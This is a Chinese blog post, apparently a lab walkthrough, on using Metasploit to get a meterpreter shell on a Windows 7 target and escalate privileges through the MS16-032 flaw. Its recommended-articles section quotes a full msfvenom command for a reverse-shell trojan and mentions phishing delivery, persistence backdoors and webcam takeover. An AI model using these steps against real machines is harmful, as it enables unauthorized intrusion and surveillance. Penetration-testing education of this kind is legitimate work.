利用meterperter进行win7系统提权

最新推荐文章于 2024-01-05 09:45:49 发布
最新推荐文章于 2024-01-05 09:45:49 发布
阅读量1.6k 收藏 9
点赞数 1
分类专栏: 网络安全 kali渗透测试 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63137680/article/details/127603598
版权

1.首先生成能够运行在win7系统上的木马程序,并把它上传到靶机win7上:

在这里插入图片描述

可见,生成的木马文件总共是7680个字节。

2.启动msfconsole,并查找相应的模块:

在这里插入图片描述

可以看到存在对应的payload供我们使用,接下来就是用exploit模块,监听在win7里的木马文件。

3.进入侦听模块,并查看需要的配置的参数:

4.设置必须的参数并设置payload

在这里插入图片描述

5.开启监听,并点击在win7上的木马程序:

在这里插入图片描述

可以看到,我们已经拿到了win7的meterpreter shell,接下来就是后渗透阶段了。

6.输入shell进入目标机的命令行,并查看当前权限:

在这里插入图片描述

由最后一行可以看到,我们当前权限是Medium Mandatory level,表明我们现在只是一个标准用户,我们的目标是拿到管理员权限High Mandatory level。

7.我们通过systeminfo命令查看系统补丁:

在这里插入图片描述

虽然有很多乱码,但是我们还是能够明显的看出系统已打的补丁编号,我们看到没有编号为KB3139914的补丁,也就是说系统还存在MS16-032漏洞。接下来我们就利用该漏洞就行提权。

7.利用命令exit返回meterpreter,并将meterpreter会话转为后台执行:

在这里插入图片描述

8.搜索ms16-032并进入该模块:

在这里插入图片描述

9.设置好session并利用该模块:

在这里插入图片描述

由返回信息可知,已经建立了新的session。

10.查看现在的权限:

在这里插入图片描述

现在已经是管理员权限了。

11.接下来就可以查看系统文件了:

查看当前处在目的机的那个位置,并且查看当前目录下有哪些文件,并上传了本地的一个letter文件:

在这里插入图片描述

在这里插入图片描述

当然我们还可以获取靶机摄像头的权限,控制对方摄像头,这里就不演示了。

雨蛏
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
win7升工具.reg
11-07
win7升工具,实测好用,希望能够帮助大家!win7升工具,实测好用,希望能够帮助大家!
后渗透之meterpreter使用攻略
钻石
01-06 8260
本文转载来源:https://xz.aliyun.com/t/2536 Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本系统命令 sessions #sessions –h 查看帮助 sessi...
meterpreter之getsystem命令详解
redwand的博客
07-23 7243
meterpreter shell是msf上集成的一组功能强大的shell集合,当我们获取一个反弹的meterpreter shell时,可以轻松的通过各种命令对靶机进行控制。熟悉的meterpreter的同学都清楚,其中有一个getsystem命令,帮助文档说明是用的,没有更详细的说明,很多人会误解为这是meterpreter的一键工具,但每次输入这个命令,都会爆出各种“incorrect“和”denied“,本文将通过理论和实验说明此命令的适用环境及过程。
Windows 7方法
系统下载
06-25 1175
Windows 7文件夹方法: 1、在操作的文件夹上点击鼠标右键——打开文件夹属性安全选项卡,按顺序点击:高级——所有者——编辑,选中Administrators用户组(或当前用户所在组),勾选下面的“替换子容器及对象的所有者”,如下图所示,最后确定并关闭属性对话框即获取该文件的所有。 2、如果授的用户为非管理员用户组,一般则可能还需要修改或升级限,类似上面方法,只需
Meterpreter
eli的博客
05-20 2091
0x01 Meterpreter自动 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为44
渗透测试window7,加强木马防范意识
yuanyuan2223的博客
04-06 5554
渗透测试window7,加强木马防范意识 通过钓鱼网站给win7系统植入后门并控制的流程 一、知识点总结: 1 生成后门程序 2 通过钓鱼方式植入木马靶机(社工) 3 使用Metasploit配置监控并控制靶机 4 控制靶机我们能做什么 二、用到的系统和工具: 1 Kali(系统); 2 Windows7(靶机系统); 3 Metasploit(渗透工具); 4 msfvenom(Metasploit自带的后门生成模块); 5 Meterpreter(后渗透常用通道); 三、使用msfvenom开始生成木马
Meterpreter命令详解
eli的博客
05-18 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制、捕获.
【内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 5416
meterpreter使用攻略(持续更新中)
12.1、后渗透测试--
无痕的博客
12-13 685
meterpreter后渗透阶段
Metasploit渗透技巧---渗透Meterpreter笔记
hackzkaq的博客
12-11 200
Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击测试。它本身附带数百个已知软件漏洞的专业级漏洞攻击测试工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来测试那些未打过补丁或者刚刚打过补丁的漏洞。
使用Metasploit对Windows7进行
zhanqinli的博客
04-21 499
8、可以查看到有多个模块可以使用,查看后面的描述来选择合适的,每个人的版本都可能不一样,因此漏洞也可能不一样,建议使用前几个模块来测试,不要问为什么(因为我后面都是试过了,都不行,或许你的可以动手试试吧。5、回到window7中,运行刚刚下载的shell文件,在kali中可以看到成功连接上了,然后在终端中输入whoami /groups可以查看当前用户限,可以看到我们只是普通用户。9、 复制该路径,使用use 进入,设置session,然后执行。
Metapreter实现持续访问,自动化,--详细教程
最新发布
qq_41245301的博客
01-05 571
1.先拿到目标主机的控制限后,将目标主机的会话转入后台,切换到 exploit/windows/local/persistence 模块,注意这个模块选择的payload,因为在后面进行监听的时候需要和这个payload相同。EXE_NAME 生成后门文件的文件名称(非必要,用默认)REG_NAME 注册表设置的名称 (非必要,用默认)VBS_NAME VBS脚本的名称 (非必要,用默认)PATH 后门文件的存放路径 (非必要,用默认)SESSION 作用于那个会话。这里会自动执行文件中的命令。
后渗透通过meterpreter模块
bring_coco的博客
11-06 905
继上一篇得到的普通session进行 方法: 一.高程序的运行级别(uac) 说明:没有绕过uac,而且会弹出uac的框,如果用户点击执行才能成功获得更高限的shell Msf模块: Exploit/windows/local/ask 1.试试看可不可以直接得到system限 发现有报错 2.然后先把meterpreter这个session放到后台 3.加载此模块 Info可查看模块描述 用更高等级的水平去执行bypass低等级的uac设置 4.设置当前需要的session 此
Meterpreter那些事
蚁景网安学院
06-20 790
一引言Meterpreter我们经常会遇到,熟悉它掌握它对渗透测试至关重要。竟然无法逃避就得学会征服它,接下来我会带领征服Meterpreter。二准备实验环境1.Kali lin...
详尽的msf——meterpreter——渗透测试教程
热门推荐
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
Meterpreter使用详解
悦分享
11-23 188
Meterpreter是一种先进的,可动态扩展的有效负载,它使用内存中的 DLL注入阶段,并在运行时通过网络扩展。它通过stager套接字进行通信并供全面的客户端Ruby API。它包含命令历史记录,制表符完成,频道等。Metepreter最初由Metasploit 2.x的skape编写,常见的扩展名合并为3.x,目前正在对Metasploit 3.3进行大修。服务器部分以纯C实现,现在使用MSVC进行编译,使其具有一定的便携性。
Metasploit的和后渗透
Kali与编程
12-04 1475
后渗透技术包括、横向移动、持久化、数据窃取、漏洞利用等,攻击者可以利用这些技术和工具深入系统内部,并获取系统中的敏感信息、高攻击者的限、绕过防御措施等。在本文中,我将详细介绍Metasploit的模块和技术,包括Windows和Linux系统下的模块和技术,以及如何使用Metasploit进行攻击。横向移动是指攻击者在入侵一个系统后,通过利用系统内部的漏洞或者获取其他用户的登录名和密码等方式,从一个系统进入另一个系统,进而攻击其他系统
12、后渗透测试--meterpreter使用
无痕的博客
12-13 1107
metasploit后渗透阶段meterpreter命令
Windows系统内核溢出漏洞
qq_61553520的博客
05-29 1534
在内存空间中预留了一定的存储空间用来缓冲输入或输出的数据。通俗的讲,缓冲区就是当你打开应用程序或者文件的时候,系统会将数据从内存中复制一份到缓冲区,当再次打开时,系统直接从缓冲区读取,高打开的速度。
meterpreter小结
MercyLin的博客
09-05 2905
经过一波操作我们成功进入meterperter,接下来主要就如何在meterpreter进行 首先我们可以输入getuid来查看当前用户的限~ 可以看到我们貌似可能是管理员限,到底是不是还有待验证,我们的最终目的是将其升到system限. getsystem自动 输入getsystem来尝试,MSF会自动选择合适的方式来升当前限 这个就比较玄学,我还没成功过,可以看到g...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

雨蛏

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值